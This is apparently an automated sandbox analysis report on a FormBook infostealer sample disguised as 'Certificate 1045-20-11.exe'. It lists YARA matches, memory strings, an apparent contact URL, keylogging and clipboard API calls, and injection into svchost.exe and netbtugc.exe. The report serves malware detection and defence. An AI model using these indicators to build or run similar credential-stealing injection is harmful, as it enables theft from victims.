            Source: netbtugc.exe, 00000003.00000002.4165640004.0000000002E87000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4165640004.0000000002E5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: netbtugc.exe, 00000003.00000002.4165640004.0000000002E87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: netbtugc.exe, 00000003.00000002.4165640004.0000000002E5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: netbtugc.exe, 00000003.00000002.4165640004.0000000002E87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
            Source: netbtugc.exe, 00000003.00000002.4165640004.0000000002E5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: netbtugc.exe, 00000003.00000002.4165640004.0000000002E87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: netbtugc.exe, 00000003.00000002.4165640004.0000000002E5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: netbtugc.exe, 00000003.00000003.2055053349.0000000007AAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: netbtugc.exe, 00000003.00000003.2061534883.0000000007ACD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: netbtugc.exe, 00000003.00000002.4168533677.0000000004E3A000.00000004.10000000.00040000.00000000.sdmp, FGcoivYXQsEMNANuoDkk.exe, 00000007.00000002.4167257692.0000000003BCA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.empowermedeco.com/fo8o/?SHqP-p=mxnR
            Source: netbtugc.exe, 00000003.00000003.2061534883.0000000007ACD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: netbtugc.exe, 00000003.00000002.4168533677.00000000044CE000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4170196597.0000000006210000.00000004.00000800.00020000.00000000.sdmp, FGcoivYXQsEMNANuoDkk.exe, 00000007.00000002.4167257692.000000000325E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_
            Source: FGcoivYXQsEMNANuoDkk.exe, 00000007.00000002.4167257692.000000000325E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.sedo.com/services/parking.php3
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_00896B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00896B0C
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_00896D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00896D07
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_00896B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00896B0C
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_00882B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00882B37
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_008AF7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_008AF7FF

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.2520000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.2520000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.4165331791.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1868757997.0000000002520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1870531753.0000000002F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4165463340.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4165026551.0000000000750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4168934011.0000000004AD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1871626103.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4166827472.0000000002450000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 1.2.svchost.exe.2520000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 1.2.svchost.exe.2520000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4165331791.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1868757997.0000000002520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1870531753.0000000002F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4165463340.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4165026551.0000000000750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.4168934011.0000000004AD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1871626103.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.4166827472.0000000002450000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Binary is likely a compiled AutoIt script file
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: This is a third-party compiled AutoIt script.0_2_00843D19
            Source: Certificate 1045-20-11.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: Certificate 1045-20-11.exe, 00000000.00000000.1695638056.00000000008EE000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_0f78d20b-c
            Source: Certificate 1045-20-11.exe, 00000000.00000000.1695638056.00000000008EE000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_914c5d2e-2
            Source: Certificate 1045-20-11.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_fbb73f25-5
            Source: Certificate 1045-20-11.exeString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_538fefa8-a
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0254B363 NtClose,1_2_0254B363
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02521D09 NtProtectVirtualMemory,1_2_02521D09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031735C0 NtCreateMutant,LdrInitializeThunk,1_2_031735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172B60 NtClose,LdrInitializeThunk,1_2_03172B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03172DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172C70 NtFreeVirtualMemory,LdrInitializeThunk,1_2_03172C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03174340 NtSetContextThread,1_2_03174340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03173010 NtOpenDirectoryObject,1_2_03173010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03173090 NtSetValueKey,1_2_03173090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03174650 NtSuspendThread,1_2_03174650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172B80 NtQueryInformationFile,1_2_03172B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172BA0 NtEnumerateValueKey,1_2_03172BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172BF0 NtAllocateVirtualMemory,1_2_03172BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172BE0 NtQueryValueKey,1_2_03172BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172AB0 NtWaitForSingleObject,1_2_03172AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172AD0 NtReadFile,1_2_03172AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172AF0 NtWriteFile,1_2_03172AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031739B0 NtGetContextThread,1_2_031739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172F30 NtCreateSection,1_2_03172F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172F60 NtCreateProcessEx,1_2_03172F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172F90 NtProtectVirtualMemory,1_2_03172F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172FB0 NtResumeThread,1_2_03172FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172FA0 NtQuerySection,1_2_03172FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172FE0 NtCreateFile,1_2_03172FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172E30 NtWriteVirtualMemory,1_2_03172E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172E80 NtReadVirtualMemory,1_2_03172E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172EA0 NtAdjustPrivilegesToken,1_2_03172EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172EE0 NtQueueApcThread,1_2_03172EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172D10 NtMapViewOfSection,1_2_03172D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03173D10 NtOpenProcessToken,1_2_03173D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172D00 NtSetInformationFile,1_2_03172D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172D30 NtUnmapViewOfSection,1_2_03172D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03173D70 NtOpenThread,1_2_03173D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172DB0 NtEnumerateKey,1_2_03172DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172DD0 NtDelayExecution,1_2_03172DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172C00 NtQueryInformationProcess,1_2_03172C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172C60 NtCreateKey,1_2_03172C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172CA0 NtQueryInformationToken,1_2_03172CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172CC0 NtQueryVirtualMemory,1_2_03172CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172CF0 NtOpenProcess,1_2_03172CF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03354340 NtSetContextThread,LdrInitializeThunk,3_2_03354340
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03354650 NtSuspendThread,LdrInitializeThunk,3_2_03354650
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03352B60 NtClose,LdrInitializeThunk,3_2_03352B60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03352BA0 NtEnumerateValueKey,LdrInitializeThunk,3_2_03352BA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03352BF0 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_03352BF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03352BE0 NtQueryValueKey,LdrInitializeThunk,3_2_03352BE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03352AF0 NtWriteFile,LdrInitializeThunk,3_2_03352AF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03352AD0 NtReadFile,LdrInitializeThunk,3_2_03352AD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03352F30 NtCreateSection,LdrInitializeThunk,3_2_03352F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03352FB0 NtResumeThread,LdrInitializeThunk,3_2_03352FB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03352FE0 NtCreateFile,LdrInitializeThunk,3_2_03352FE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03352E80 NtReadVirtualMemory,LdrInitializeThunk,3_2_03352E80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03352EE0 NtQueueApcThread,LdrInitializeThunk,3_2_03352EE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03352D30 NtUnmapViewOfSection,LdrInitializeThunk,3_2_03352D30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03352D10 NtMapViewOfSection,LdrInitializeThunk,3_2_03352D10
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03352DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_03352DF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03352DD0 NtDelayExecution,LdrInitializeThunk,3_2_03352DD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03352C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_03352C70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03352C60 NtCreateKey,LdrInitializeThunk,3_2_03352C60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03352CA0 NtQueryInformationToken,LdrInitializeThunk,3_2_03352CA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_033535C0 NtCreateMutant,LdrInitializeThunk,3_2_033535C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_033539B0 NtGetContextThread,LdrInitializeThunk,3_2_033539B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03352B80 NtQueryInformationFile,3_2_03352B80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03352AB0 NtWaitForSingleObject,3_2_03352AB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03352F60 NtCreateProcessEx,3_2_03352F60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03352FA0 NtQuerySection,3_2_03352FA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03352F90 NtProtectVirtualMemory,3_2_03352F90
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03352E30 NtWriteVirtualMemory,3_2_03352E30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03352EA0 NtAdjustPrivilegesToken,3_2_03352EA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03352D00 NtSetInformationFile,3_2_03352D00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03352DB0 NtEnumerateKey,3_2_03352DB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03352C00 NtQueryInformationProcess,3_2_03352C00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03352CF0 NtOpenProcess,3_2_03352CF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03352CC0 NtQueryVirtualMemory,3_2_03352CC0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03353010 NtOpenDirectoryObject,3_2_03353010
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03353090 NtSetValueKey,3_2_03353090
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03353D10 NtOpenProcessToken,3_2_03353D10
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03353D70 NtOpenThread,3_2_03353D70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_00777920 NtCreateFile,3_2_00777920
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_00777A70 NtReadFile,3_2_00777A70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_00777B50 NtDeleteFile,3_2_00777B50
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_00777BE0 NtClose,3_2_00777BE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_00777D30 NtAllocateVirtualMemory,3_2_00777D30
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_00886685: CreateFileW,DeviceIoControl,CloseHandle,0_2_00886685
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_0087ACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_0087ACC5
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_008879D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_008879D3
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_0086B0430_2_0086B043
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_008532000_2_00853200
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_00853B700_2_00853B70
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_0087410F0_2_0087410F
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_008602A40_2_008602A4
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_0087038E0_2_0087038E
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_0084E3B00_2_0084E3B0
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_008606D90_2_008606D9
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_0087467F0_2_0087467F
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_008AAACE0_2_008AAACE
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_00874BEF0_2_00874BEF
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_0086CCC10_2_0086CCC1
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_00846F070_2_00846F07
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_0084AF500_2_0084AF50
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_008A31BC0_2_008A31BC
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_0086D1B90_2_0086D1B9
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_0085B11F0_2_0085B11F
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_0086123A0_2_0086123A
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_0087724D0_2_0087724D
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_008813CA0_2_008813CA
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_008493F00_2_008493F0
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_0085F5630_2_0085F563
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_008496C00_2_008496C0
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_0088B6CC0_2_0088B6CC
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_008477B00_2_008477B0
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_008AF7FF0_2_008AF7FF
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_008779C90_2_008779C9
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_0085FA570_2_0085FA57
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_00849B600_2_00849B60
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_00847D190_2_00847D19
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_00869ED00_2_00869ED0
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_0085FE6F0_2_0085FE6F
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_00847FA30_2_00847FA3
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_00EB11880_2_00EB1188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_025212901_2_02521290
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_025368731_2_02536873
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_025368711_2_02536871
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_025228A01_2_025228A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_025301731_2_02530173
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_025211101_2_02521110
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0252E1F31_2_0252E1F3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_025226981_2_02522698
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0252268A1_2_0252268A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_025226A01_2_025226A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0252FF531_2_0252FF53
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0254D7531_2_0254D753
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0252FF4A1_2_0252FF4A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_025235001_2_02523500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F132D1_2_031F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031FA3521_2_031FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312D34C1_2_0312D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0318739A1_2_0318739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032003E61_2_032003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314E3F01_2_0314E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E02741_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031452A01_2_031452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315B2C01_2_0315B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C02C01_2_031C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315D2F01_2_0315D2F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E12ED1_2_031E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DA1181_2_031DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031301001_2_03130100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C81581_2_031C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0320B16B1_2_0320B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312F1721_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0317516C1_2_0317516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032001AA1_2_032001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314B1B01_2_0314B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F81CC1_2_031F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031EF0CC1_2_031EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031470C01_2_031470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F70E91_2_031F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031FF0E01_2_031FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031647501_2_03164750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031407701_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031FF7B01_2_031FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313C7C01_2_0313C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F16CC1_2_031F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315C6E01_2_0315C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031405351_2_03140535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F75711_2_031F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DD5B01_2_031DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032005911_2_03200591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031FF43F1_2_031FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F24461_2_031F2446
